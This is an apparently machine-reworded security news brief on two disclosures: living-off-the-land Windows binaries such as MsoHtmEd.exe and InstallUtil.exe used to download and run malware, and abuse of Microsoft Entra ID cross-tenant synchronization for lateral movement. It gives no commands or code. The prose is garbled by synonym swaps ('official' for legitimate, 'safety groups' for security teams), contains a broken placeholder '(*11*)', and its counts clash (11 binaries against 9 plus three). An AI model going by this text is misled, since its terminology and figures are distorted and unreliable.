Cybersecurity researchers have found a set of 11 living-off-the-land binaries-and-scripts (LOLBAS) that could possibly be used by attackers to conduct post-exploitation actions. LOLBAS is a technique that makes use of system binaries and scripts for malicious functions, making it tough for safety groups to tell apart between official and malicious actions. The Israeli cybersecurity firm, Pentera, uncovered 9 LOLBAS downloaders and three executors that might permit adversaries to obtain and execute extra superior malware on contaminated hosts. These embody varied information reminiscent of MsoHtmEd.exe, Mspub.exe, and InstallUtil.exe. Attackers can use LOLBAS downloaders to acquire extra sturdy malware after which execute it in a stealthy means utilizing LOLBAS executors, showing as a part of a official course of tree on the system. Pentera additionally talked about that attackers may make the most of executables from software program exterior of Microsoft to realize related objectives.
Additionally, Vectra lately disclosed a possible assault vector that exploits the Microsoft Entra ID cross-tenant synchronization (CTS) function to facilitate lateral motion between linked tenants. This implies that an attacker in a compromised setting can use an current CTS configuration to maneuver laterally from one tenant to a different, assuming they’ve already compromised a privileged id within the cloud setting. Alternatively, an attacker in a compromised tenant can deploy a rogue Cross Tenant (*11*) configuration to take care of persistent entry. It is essential for organizations to concentrate on these vulnerabilities and take applicable measures to guard their techniques and knowledge.
Source hyperlink